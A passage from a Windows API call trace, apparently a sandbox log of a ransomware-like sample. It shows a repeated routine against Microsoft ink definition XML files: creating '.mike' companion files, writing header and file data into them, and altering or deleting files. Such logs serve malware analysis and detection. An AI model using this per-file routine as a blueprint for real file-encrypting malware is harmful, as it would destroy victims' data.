Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml", nBufferLength=0x105, lpBuffer=0x2aec28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml", lpFilePart=0x0) returned 0x54 [0045.819] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml", lpFilePart=0x0) returned 0x54 [0045.819] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml", nBufferLength=0x105, lpBuffer=0x2aebac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml", lpFilePart=0x0) returned 0x54 [0045.819] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml.mike", nBufferLength=0x105, lpBuffer=0x2aebb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml.mike", lpFilePart=0x0) returned 0x59 [0045.819] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af010) returned 1 [0045.819] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af08c | out: lpFileInformation=0x2af08c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0045.819] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af00c) returned 1 [0045.819] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeab8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml.mike", lpFilePart=0x0) returned 0x59 [0045.819] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefac) returned 1 [0045.819] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.819] GetFileType (hFile=0x264) returned 0x1 [0045.820] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefa8) returned 1 [0045.820] GetFileType (hFile=0x264) returned 0x1 [0045.820] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x0 [0045.820] WriteFile (in: hFile=0x264, lpBuffer=0x21953b8*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af02c, lpOverlapped=0x0 | out: lpBuffer=0x21953b8*, lpNumberOfBytesWritten=0x2af02c*=0x220, lpOverlapped=0x0) returned 1 [0045.821] CloseHandle (hObject=0x264) returned 1 [0045.821] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0045.821] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml"), fInfoLevelId=0x0, lpFileInformation=0x2194e64 | out: lpFileInformation=0x2194e64*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c8fc70, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1c8fc70, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f643b69, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xc59)) returned 1 [0045.821] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0045.821] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml", nBufferLength=0x105, lpBuffer=0x2aeaa8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml", lpFilePart=0x0) returned 0x54 [0045.821] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aef9c) returned 1 [0045.821] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.821] GetFileType (hFile=0x264) returned 0x1 [0045.821] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aef98) returned 1 [0045.821] GetFileType (hFile=0x264) returned 0x1 [0045.821] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af02c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af02c*=0) returned 0x0 [0045.821] ReadFile (in: hFile=0x264, lpBuffer=0x2196504, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af038, lpOverlapped=0x0 | out: lpBuffer=0x2196504*, lpNumberOfBytesRead=0x2af038*=0xc59, lpOverlapped=0x0) returned 1 [0045.828] CloseHandle (hObject=0x264) returned 1 [0045.828] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeab8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml.mike", lpFilePart=0x0) returned 0x59 [0045.828] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefac) returned 1 [0045.828] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.828] GetFileType (hFile=0x264) returned 0x1 [0045.829] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefa8) returned 1 [0045.829] GetFileType (hFile=0x264) returned 0x1 [0045.829] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x220 [0045.829] WriteFile (in: hFile=0x264, lpBuffer=0x219ddf4*, nNumberOfBytesToWrite=0xc60, lpNumberOfBytesWritten=0x2af02c, lpOverlapped=0x0 | out: lpBuffer=0x219ddf4*, lpNumberOfBytesWritten=0x2af02c*=0xc60, lpOverlapped=0x0) returned 1 [0045.829] CloseHandle (hObject=0x264) returned 1 [0045.830] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeac0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml.mike", lpFilePart=0x0) returned 0x59 [0045.830] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefb4) returned 1 [0045.830] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.830] GetFileType (hFile=0x264) returned 0x1 [0045.830] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefb0) returned 1 [0045.830] GetFileType (hFile=0x264) returned 0x1 [0045.831] WriteFile (in: hFile=0x264, lpBuffer=0x21a103c*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af05c, lpOverlapped=0x0 | out: lpBuffer=0x21a103c*, lpNumberOfBytesWritten=0x2af05c*=0x20c, lpOverlapped=0x0) returned 1 [0045.831] CloseHandle (hObject=0x264) returned 1 [0045.831] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml", nBufferLength=0x105, lpBuffer=0x2aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml", lpFilePart=0x0) returned 0x54 [0045.832] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml.mike", lpFilePart=0x0) returned 0x59 [0045.832] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0045.832] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af124 | out: lpFileInformation=0x2af124*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5826500, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe5826500, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe584c660, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xe80)) returned 1 [0045.832] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0a4) returned 1 [0045.832] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml", nBufferLength=0x105, lpBuffer=0x2aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml", lpFilePart=0x0) returned 0x54 [0045.832] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml.mike", lpFilePart=0x0) returned 0x59 [0045.832] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0045.832] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x21a2878 | out: lpFileInformation=0x21a2878*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5826500, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe5826500, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe584c660, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xe80)) returned 1 [0045.832] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0045.832] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml", lpFilePart=0x0) returned 0x54 [0045.832] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml", dwFileAttributes=0x80) returned 0 [0045.833] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml", nBufferLength=0x105, lpBuffer=0x2aeb5c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml", lpFilePart=0x0) returned 0x54 [0045.833] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml.mike", lpFilePart=0x0) returned 0x59 [0045.833] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe0) returned 1 [0045.833] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af05c | out: lpFileInformation=0x2af05c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5826500, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe5826500, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe584c660, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xe80)) returned 1 [0045.834] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefdc) returned 1 [0045.834] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml", nBufferLength=0x105, lpBuffer=0x2aeb5c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml", lpFilePart=0x0) returned 0x54 [0045.834] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml.mike", lpFilePart=0x0) returned 0x59 [0045.834] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml.mike")) returned 1 [0045.835] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml", lpFilePart=0x0) returned 0x51 [0045.835] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml", lpFilePart=0x0) returned 0x51 [0045.835] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml", nBufferLength=0x105, lpBuffer=0x2aeb98, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml", lpFilePart=0x0) returned 0x51 [0045.835] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af08c) returned 1 [0045.835] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0045.836] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adec8) returned 1 [0045.836] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml", nBufferLength=0x105, lpBuffer=0x2aead0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml", lpFilePart=0x0) returned 0x51 [0045.836] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefc4) returned 1 [0045.836] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.836] GetFileType (hFile=0x264) returned 0x1 [0045.836] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefc0) returned 1 [0045.836] GetFileType (hFile=0x264) returned 0x1 [0045.837] CloseHandle (hObject=0x264) returned 1 [0045.837] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml", nBufferLength=0x105, lpBuffer=0x2aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml", lpFilePart=0x0) returned 0x51 [0045.837] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml", lpFilePart=0x0) returned 0x51 [0045.837] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aebcc, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0045.837] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af120) returned 1 [0045.837] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c | out: lpFreeBytesAvailableToCaller=0x2af14c, lpTotalNumberOfBytes=0x2af144, lpTotalNumberOfFreeBytes=0x2af13c) returned 1 [0045.837] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af11c) returned 1 [0045.837] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0045.837] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml"), fInfoLevelId=0x0, lpFileInformation=0x21a4ae4 | out: lpFileInformation=0x21a4ae4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1cb5dcd, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1cb5dcd, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f669cc7, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xc5e)) returned 1 [0045.837] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0045.837] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml", nBufferLength=0x105, lpBuffer=0x2aec44, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml", lpFilePart=0x0) returned 0x51 [0045.837] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0045.837] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml"), fInfoLevelId=0x0, lpFileInformation=0x21a4e24 | out: lpFileInformation=0x21a4e24*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1cb5dcd, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1cb5dcd, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f669cc7, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xc5e)) returned 1 [0045.837] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0045.837] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml", nBufferLength=0x105, lpBuffer=0x2aec24, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml", lpFilePart=0x0) returned 0x51 [0045.838] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml.mike", lpFilePart=0x0) returned 0x56 [0045.838] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a8) returned 1 [0045.838] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af124 | out: lpFileInformation=0x2af124*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0045.838] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0a4) returned 1 [0045.838] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml", nBufferLength=0x105, lpBuffer=0x2aec28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml", lpFilePart=0x0) returned 0x51 [0045.838] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml", nBufferLength=0x105, lpBuffer=0x2aec20, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml", lpFilePart=0x0) returned 0x51 [0045.838] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml", nBufferLength=0x105, lpBuffer=0x2aebac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml", lpFilePart=0x0) returned 0x51 [0045.838] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml.mike", nBufferLength=0x105, lpBuffer=0x2aebb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml.mike", lpFilePart=0x0) returned 0x56 [0045.838] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af010) returned 1 [0045.838] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af08c | out: lpFileInformation=0x2af08c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0045.838] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af00c) returned 1 [0045.838] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeab8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml.mike", lpFilePart=0x0) returned 0x56 [0045.838] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefac) returned 1 [0045.838] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0045.839] GetFileType (hFile=0x264) returned 0x1 [0045.839] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefa8) returned 1 [0045.839] GetFileType (hFile=0x264) returned 0x1 [0045.839] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x0 [0045.839] WriteFile (in: hFile=0x264, lpBuffer=0x21a5da8*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af02c, lpOverlapped=0x0 | out: lpBuffer=0x21a5da8*, lpNumberOfBytesWritten=0x2af02c*=0x220, lpOverlapped=0x0) returned 1 [0045.840] CloseHandle (hObject=0x264) returned 1 [0045.840] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0045.840] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml"), fInfoLevelId=0x0, lpFileInformation=0x21a5870 | out: lpFileInformation=0x21a5870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1cb5dcd, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1cb5dcd, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f669cc7, 